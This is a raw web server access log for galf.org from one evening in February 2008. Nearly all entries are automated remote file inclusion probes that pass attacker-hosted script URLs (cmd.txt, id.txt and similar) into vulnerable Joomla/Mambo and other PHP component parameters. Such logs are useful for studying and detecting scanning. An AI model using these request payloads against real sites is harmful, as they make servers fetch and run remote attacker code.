195.234.108.168 - - [17/Feb/2008:18:25:12 -0800] "GET /logs/administrator/components/com_performs/lib/lib_template.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:18:26:07 -0800] "GET /index.php?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.19.178.81 - - [17/Feb/2008:18:26:22 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.31.183.74 - - [17/Feb/2008:18:27:24 -0800] "GET /logs/access_080114.log//?mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:18:29:04 -0800] "GET /administrator/components/com_performs/lib/lib_template.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
195.234.108.168 - - [17/Feb/2008:18:29:04 -0800] "GET /logs/administrator/components/com_performs/lib/lib_template.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
81.91.66.79 - - [17/Feb/2008:18:31:17 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
77.232.68.10 - - [17/Feb/2008:18:31:36 -0800] "GET /nav.php?pag=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
89.184.165.34 - - [17/Feb/2008:18:31:50 -0800] "GET /logs/access.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
89.184.165.34 - - [17/Feb/2008:18:31:50 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
68.52.242.139 - - [17/Feb/2008:18:32:45 -0800] "GET /logs/access.log//admin/includes/admin_header.php?level=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
68.52.242.139 - - [17/Feb/2008:18:32:46 -0800] "GET /logs//admin/includes/admin_header.php?level=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
82.134.6.30 - - [17/Feb/2008:18:33:53 -0800] "GET /logs/access_070917.log/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:18:33:54 -0800] "GET /?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:18:33:54 -0800] "GET /logs/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 6203 "-" "libwww-perl/5.803" "www.galf.org"
82.146.33.210 - - [17/Feb/2008:18:34:28 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
82.146.33.210 - - [17/Feb/2008:18:34:28 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:18:34:37 -0800] "GET /logs/access_080114.log/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.232.68.10 - - [17/Feb/2008:18:34:45 -0800] "GET /logs/access.log/nav.php?pag=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.43.191.180 - - [17/Feb/2008:18:34:46 -0800] "GET /logs/access_070917.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.43.191.180 - - [17/Feb/2008:18:34:46 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.43.191.180 - - [17/Feb/2008:18:34:46 -0800] "GET /logs/access_070917.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.43.191.180 - - [17/Feb/2008:18:34:46 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.43.191.180 - - [17/Feb/2008:18:34:46 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.43.191.180 - - [17/Feb/2008:18:34:46 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [17/Feb/2008:18:35:14 -0800] "GET /logs/nav.php?pag=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
210.245.164.10 - - [17/Feb/2008:18:35:30 -0800] "GET /logs/access_080114.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.196.27.145 - - [17/Feb/2008:18:35:42 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
128.196.27.145 - - [17/Feb/2008:18:35:42 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
202.60.64.18 - - [17/Feb/2008:18:38:09 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
202.60.64.18 - - [17/Feb/2008:18:38:10 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:18:38:27 -0800] "GET /logs/access_070917.log/index.php?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:18:38:28 -0800] "GET /logs/index.php?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.21.85.101 - - [17/Feb/2008:18:39:00 -0800] "GET /logs/access_080114.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:18:39:30 -0800] "GET /logs/access_070917.log/modules/My_eGallery/index.php?basepath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.195.11.193 - - [17/Feb/2008:18:40:18 -0800] "GET /nav.php?pag=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
68.52.242.139 - - [17/Feb/2008:18:40:38 -0800] "GET /logs/access.log//admin/includes/admin_header.php?level=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
68.52.242.139 - - [17/Feb/2008:18:40:38 -0800] "GET /logs//admin/includes/admin_header.php?level=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
210.48.70.151 - - [17/Feb/2008:18:43:34 -0800] "GET //?mosConfig_absolute_path=http://www.u-p-r.org/ab/response?%0D? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
210.48.70.151 - - [17/Feb/2008:18:43:34 -0800] "GET /logs//?mosConfig_absolute_path=http://www.u-p-r.org/ab/response?%0D? HTTP/1.1" 200 6208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:18:44:03 -0800] "GET /logs/administrator/components/com_performs/lib/lib_valid.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:18:44:03 -0800] "GET /administrator/components/com_performs/lib/lib_valid.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
206.221.184.180 - - [17/Feb/2008:18:44:10 -0800] "GET /logs/access_080114.log/index1.php?=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.221.184.180 - - [17/Feb/2008:18:44:10 -0800] "GET /index1.php?=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.221.184.180 - - [17/Feb/2008:18:44:10 -0800] "GET /logs/index1.php?=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
210.48.70.151 - - [17/Feb/2008:18:45:01 -0800] "GET //?mosConfig_absolute_path=http://www.u-p-r.org/ab/response?%0D? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "galf.org"
210.48.70.151 - - [17/Feb/2008:18:45:01 -0800] "GET /logs//?mosConfig_absolute_path=http://www.u-p-r.org/ab/response?%0D? HTTP/1.1" 200 6208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "galf.org"
211.255.32.189 - - [17/Feb/2008:18:48:35 -0800] "GET /logs/access_070917.log/template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.255.32.189 - - [17/Feb/2008:18:48:36 -0800] "GET /template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.255.32.189 - - [17/Feb/2008:18:48:36 -0800] "GET /logs/template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.255.32.189 - - [17/Feb/2008:18:48:42 -0800] "GET /logs/access_080114.log/template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.18.206 - - [17/Feb/2008:18:53:00 -0800] "GET /labia/?M=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.91.66.79 - - [17/Feb/2008:18:53:40 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
81.91.66.79 - - [17/Feb/2008:18:53:40 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
213.203.223.25 - - [17/Feb/2008:18:53:53 -0800] "GET /index2.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
213.203.223.25 - - [17/Feb/2008:18:53:53 -0800] "GET /logs/index2.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
67.18.106.122 - - [17/Feb/2008:18:54:05 -0800] "GET /logs//?mosConfig_absolute_path=http://germanyhost.de/contenido/external/wysiwyg/tinymce/jscripts/tiny_mce/plugins/preview/langs/.up/phpmic.txt.txt? HTTP/1.1" 200 6208 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
67.18.106.122 - - [17/Feb/2008:18:54:05 -0800] "GET //?mosConfig_absolute_path=http://germanyhost.de/contenido/external/wysiwyg/tinymce/jscripts/tiny_mce/plugins/preview/langs/.up/phpmic.txt.txt? HTTP/1.1" 200 1048 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
64.13.222.135 - - [17/Feb/2008:18:55:34 -0800] "GET /logs/access_070917.log/template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.222.135 - - [17/Feb/2008:18:55:34 -0800] "GET /logs/template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.222.135 - - [17/Feb/2008:18:55:42 -0800] "GET /logs/access_080114.log/template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.48.70.151 - - [17/Feb/2008:18:56:17 -0800] "GET //?mosConfig_absolute_path=http://www.u-p-r.org/ab/response?%0D? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
210.48.70.151 - - [17/Feb/2008:18:56:17 -0800] "GET /logs//?mosConfig_absolute_path=http://www.u-p-r.org/ab/response?%0D? HTTP/1.1" 200 6208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
195.56.111.194 - - [17/Feb/2008:18:56:22 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
210.48.70.151 - - [17/Feb/2008:18:57:56 -0800] "GET //?mosConfig_absolute_path=http://www.u-p-r.org/ab/response?%0D? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "galf.org"
210.48.70.151 - - [17/Feb/2008:18:57:56 -0800] "GET /logs//?mosConfig_absolute_path=http://www.u-p-r.org/ab/response?%0D? HTTP/1.1" 200 6208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "galf.org"
65.254.58.42 - - [17/Feb/2008:18:58:14 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absohttp://bashkllr.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
65.254.58.42 - - [17/Feb/2008:18:58:15 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absohttp://bashkllr.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
213.203.223.25 - - [17/Feb/2008:19:00:23 -0800] "GET /logs/index3.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
213.203.223.25 - - [17/Feb/2008:19:00:23 -0800] "GET /index3.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
89.255.3.76 - - [17/Feb/2008:19:01:00 -0800] "GET /logs/access_080114.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.255.3.76 - - [17/Feb/2008:19:01:01 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.255.3.76 - - [17/Feb/2008:19:01:01 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.232.68.10 - - [17/Feb/2008:19:01:29 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.80.72.89 - - [17/Feb/2008:19:03:46 -0800] "GET /logs/access_080114.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://x.apescar.net/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.80.72.89 - - [17/Feb/2008:19:03:46 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://x.apescar.net/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.80.72.89 - - [17/Feb/2008:19:03:47 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://x.apescar.net/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:19:06:24 -0800] "GET /logs/access_070917.log/modules/My_eGallery/index.php?basepath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.15 - - [17/Feb/2008:19:10:44 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.15 - - [17/Feb/2008:19:10:44 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.11.181 - - [17/Feb/2008:19:11:43 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.226.93.66 - - [17/Feb/2008:19:12:08 -0800] "GET /logs/access_070917.log/template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.226.93.66 - - [17/Feb/2008:19:12:08 -0800] "GET /template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.226.93.66 - - [17/Feb/2008:19:12:08 -0800] "GET /logs/template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.226.93.66 - - [17/Feb/2008:19:12:09 -0800] "GET /logs/access_080114.log/template.php?pagina=http://www.ar-vision.com/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.160.16.3 - - [17/Feb/2008:19:13:15 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
200.11.67.242 - - [17/Feb/2008:19:13:26 -0800] "GET /logs/access_070917.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [17/Feb/2008:19:13:27 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [17/Feb/2008:19:13:27 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.239.10.63 - - [17/Feb/2008:19:13:42 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.myadultsshop.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [17/Feb/2008:19:14:05 -0800] "GET /logs/access_080114.log//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [17/Feb/2008:19:14:05 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.159.204.29 - - [17/Feb/2008:19:14:27 -0800] "GET /logs/access_080114.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.159.204.29 - - [17/Feb/2008:19:14:28 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.159.204.29 - - [17/Feb/2008:19:14:29 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.184.165.34 - - [17/Feb/2008:19:15:18 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.60.80.202 - - [17/Feb/2008:19:18:40 -0800] "GET /logs/access_070917.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.202 - - [17/Feb/2008:19:18:41 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.202 - - [17/Feb/2008:19:18:41 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.221.130.15 - - [17/Feb/2008:19:19:04 -0800] "GET /logs/access_080114.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.15 - - [17/Feb/2008:19:19:04 -0800] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.15 - - [17/Feb/2008:19:19:04 -0800] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.15 - - [17/Feb/2008:19:19:58 -0800] "GET /logs/access_070917.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.15 - - [17/Feb/2008:19:19:58 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.101.197.130 - - [17/Feb/2008:19:20:09 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.221.130.15 - - [17/Feb/2008:19:20:18 -0800] "GET /logs/access_070917.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.15 - - [17/Feb/2008:19:20:18 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.77.102.172 - - [17/Feb/2008:19:20:55 -0800] "GET /logs/access_080114.log/components/com_simpleboard/image_upload.php?sbp=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.77.102.172 - - [17/Feb/2008:19:20:55 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.77.102.172 - - [17/Feb/2008:19:20:55 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.77.102.172 - - [17/Feb/2008:19:21:00 -0800] "GET /logs/access_080114.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.77.102.172 - - [17/Feb/2008:19:21:00 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
